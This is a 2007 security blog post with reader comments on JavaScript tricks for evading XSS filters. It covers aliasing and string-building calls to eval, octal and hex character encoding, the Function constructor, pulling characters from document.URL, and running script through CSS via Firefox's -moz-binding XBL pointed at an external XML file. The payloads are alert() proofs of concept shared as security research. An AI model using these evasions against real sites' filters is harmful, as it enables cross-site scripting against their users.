Javascript for hackers
Wednesday, 19 September 2007
I’ve spent a bit of time experimenting with Javascript over the last few weeks and I thought I’d share some of the techniques used. First of all Javascript is weird, cool and surprising language, it is just simply not possible to learn everything it can do.
Most of these techniques were used whilst hacking/playing with the PHPIDS and I got addicted to finding new ways of doing things. I’ve followed a question and answer format for this post as I think it is easier to follow rather than one big post of techniques.
What can you do if you can’t use eval()?
In Javascript you can store references to native functions in variables so for example you can do the following:-
x=eval;
x();// calls eval
Geko based browsers also allow you to call the eval function like this:-
0['eval']('alert(/XSS/)')
So you can do stuff like, use your imagination:-
0['ev'+'al']('alert(/XSS/)');
How do I get round using certain characters/words?
Javascript supports various encoding which allows you to represent different characters. So the following unicode example creates the eval and alert combination:-
alert('\141\154\145\162\164\050\061\051')
So \141 translates to ‘a’ etc, when you have a string in javascript by using “” or ” you can use unicode characters, when javascript encounters the ‘\’ it will convert the character depending on it’s character code.
Hex decimal encoding can also be used like the following:-
alertString = 'a\x6cert(1)';
You can also use eval to convert the character for you, for example the following produces the letter ‘a’:-
charNumber = 141;
stringQuote = "'";
backslash = "\\";
alert(eval(stringQuote + backslash + charNumber + stringQuote));
How do you call anonymous functions?
Javascript allows you to call functions when you use ‘()’ as you already know, but you can also use it to call anonymous functions like the following:-
new Function('alert(1)')();
The code above creates a new anonymous function and passes the string ‘alert(1)’ which is embedded into the newly created function, it then calls executes the function. You can also combine the techniques mentioned, like using different characters encodings to pass the string information , you also don’t need to specify ‘new’ e.g.
Function('a\x6cert(1)')();
What can you use as variable names?
Javascript isn’t very strict and is pretty lax when it comes to variables names for example the ‘_’ character is allowed as a variable name or even a ‘$’ can be used as a variable name, even different character sets are allowed for variable names.
How can you create a string?
Strings are defined using String(), ” and “” etc. What you might not have known though is that regular expressions can also be used to create a string, like the following examples:-
newString = /XSS/.source;
newString = /XSS/ + '';
newString = newString[1] + newString[2] + newString[3];
I really need this character but it’s not allowed, how do I get it?
Think around the problem, rather than try to access the character directly get the information from another source. Like for example say you wanted the colon character and you tried urlencodings and various character encodings, you can use the URL property to gain this information. Example:-
alert(document.URL.substr(4, 1));
I like the document.URL technique, what else is possible using similar techniques?
Surprisingly often you don’t even need to call the document object to access some functions, so URL is available within the context of the HTML element:-
Test
In Internet Explorer you can even set the URL property to cause XSS like this:-
Test
Are there any other ways of executing javascript in CSS?
Firefox has a few features which allow unusual Javascript execution, among them is the -moz-binding css extension which allows you to link XML documents using CSS. Here is an example:-
Test
How can I use XML within Javascript?
Firefox now supports XML in javascript code, you can just include the tags like this:-
testXML = Test XML string;
alert(textXML.text());
No. 1 — September 20th, 2007 at 1:13 am
I’d like to point out a few things.
First, there’s another way you can call an anonymous function:
(function() {
alert(1);
})();
Second, Gecko-based browsers have eval attached to all objects. This basically means you can call eval anywhere. Numbers (like the example you’ve provided), strings, regular expressions, arrays, and, ultimately, objects.
This can result in all sorts of syntactically bizarre examples:
(6)[‘e’ + ‘val’](‘alert(/XSS/)’);
/blah/[‘ev’ + ‘al’](‘alert(/XSS/)’);
[][‘eva’ + ‘l’](‘alert(/XSS/)’);
({})[‘eval’](‘alert(/XSS/)’);
Third, XML support in JavaScript code is called E4X (ECMAScript for XML).
No. 2 — September 20th, 2007 at 7:21 am
Hi kourge
Thanks for the good points
No. 3 — September 23rd, 2007 at 5:27 am
This is the good stuff… 🙂
Cool tricks, you should start a new XSS sheet with them.
No. 4 — September 23rd, 2007 at 5:38 pm
Thanks Ronald
I prefer posts really, cheatsheets are good but I like to write a bit of an explanation so it’s accessible to more people.
No. 5 — October 2nd, 2007 at 12:39 am
thanks for the tips.
No. 6 — October 2nd, 2007 at 1:50 am
Good. Thanks.
I think encoding thing is not a surprise one..
>>>Are there any other ways of executing javascript in CSS?
You mean, we can write the javascript in css file and we have to link that css file by using -moz-binding???
Can you show me more information about that?
Thanks.
No. 7 — October 2nd, 2007 at 8:18 am
@Michael
In the example provided Javascript is executed by linking to a XML file:-
<p style=-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>Test</p>
You can view the source of the XML here:-
http://www.businessinfo.co.uk/labs/xbl/xbl.xml
Cheers
No. 8 — October 15th, 2007 at 12:39 pm
These are awesome. I especially like the (6)[‘e’ + ‘val’](‘alert(/XSS/)’);
^ So much win right there.
It looks like all you need to hack is to just get into a script tag.
No. 9 — October 15th, 2007 at 1:07 pm
If you like that…check out the XML stuff I’ve been working on:-
http://www.thespanner.co.uk/2007/10/09/injecting-the-script-tag-into-xml/
😀
No. 10 — November 16th, 2007 at 3:54 pm
Look this
http://iframe.in/howto/javascript-into-css/
The method essence is perfectly visible on the first example, its for IExplore. Second example demonstrate JavaScript in CSS via XBL, it’s works only on Firefox.
No. 11 — November 16th, 2007 at 4:09 pm
@Jacky
Thanks for the link I was aware of all those issues but someone else who reads my blog might not. Thanks again 🙂
No. 12 — November 18th, 2007 at 5:39 pm
This is the good job.
Cool tips, you should start a new XSS sheet with them.
No. 13 — November 18th, 2007 at 5:54 pm
Thanks well actually I’ve created a hacking utility that will include advanced XSS and filter evasion tags which is like an interactive cheatsheet:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
No. 14 — November 19th, 2007 at 12:15 am
Is there anything like this that works with IE 7?
<p style=-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>Test</p>
No. 15 — November 19th, 2007 at 9:03 am
Hi Peter
Yep you can use expression in IE7, Martin has a great article here:-
http://the-mice.co.uk/switch/?p=39
The article shows a combined Firefox and IE way of inserting code into the style attribute. Hope it helps.
No. 16 — February 21st, 2008 at 4:57 pm
anyone know how to fire off a javascript function using a URL?
I have a webpage which has a few javascript functions associated with it to do different things. Now I want to know if it is possible to provide a link to the page and invoke one of these functions with parameters. can this be done?
let’s say the site is http://www.blahblahblah.com/simplepage.html
and the function is called myTestFunction(number)
I can set up links on the simplepage.html file using a href’s with the link javascript:myTestFunction(1) for example but how would I do this in one foul swoop letting someone go directly to the function without clicking on the link on the page?
Cheers